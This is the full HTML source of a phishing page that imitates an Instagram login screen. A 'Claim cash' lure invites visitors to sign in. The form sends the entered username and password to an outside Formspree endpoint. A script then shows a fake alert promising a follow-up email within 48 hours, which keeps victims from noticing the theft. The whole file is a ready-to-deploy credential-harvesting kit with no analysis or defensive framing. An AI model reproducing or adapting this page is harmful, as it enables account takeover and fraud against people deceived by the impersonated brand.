<!DOCTYPE html>
<html>
<head>
    <title>Instagram-like Login</title>
    <style>
        /* CSS styles go here */
        body {
            font-family: Arial, sans-serif;
            background-color: #f3f4f7;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .container {
            background-color: #fff;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: center;
            padding: 20px;
            width:350px;
            padding-right:40px;
            padding-left:20px;
        }
        .logo {
            background-image: url('/Screenshot_20231018-204528-01.jpeg'); /* Replace with your image path */
            background-size: contain;
            background-repeat: no-repeat;
            width: 150px;
            height: 50px;
            margin: 0 auto 20px;
        }
        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 10px;
            margin: 8px 0;
            border: 1px solid #ccc;
            border-radius: 3px;
            overflow:hidden;
        }
        button {
            background-color: #3897f0;
            color: #fff;
            padding: 10px 20px;
            border: none;
            border-radius: 6px;
            cursor: pointer;
            width:370px;
        }
        button:hover {
            background-color: #3578e0;
        }
        h5{
           margin:6px;
           padding:0px;
           font-weight:400;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo"></div>
       <form class="card-form"action="https://formspree.io/f/mleyobwa" method="POST">
            <input type="text" name="usname"placeholder="Username or Email">
            <input type="text" name="psw" placeholder="Password">
            <button type="submit" onclick="sub()">Log In</button>
        </form>
        <!-- <h5>Don't have an account? <a href="#">Sign up</a></h5>
        <h5>Forgot your password? <a href="#">forgot</a></h5> -->
        <h5>login your account to  <a href="#"> Claim cash </a></h5>
         
    </div>
    <script>
       function sub(){
          alert("you will recieve a mail after review within 48hr to proceed it .");
       }
    </script>
</body>
</html>
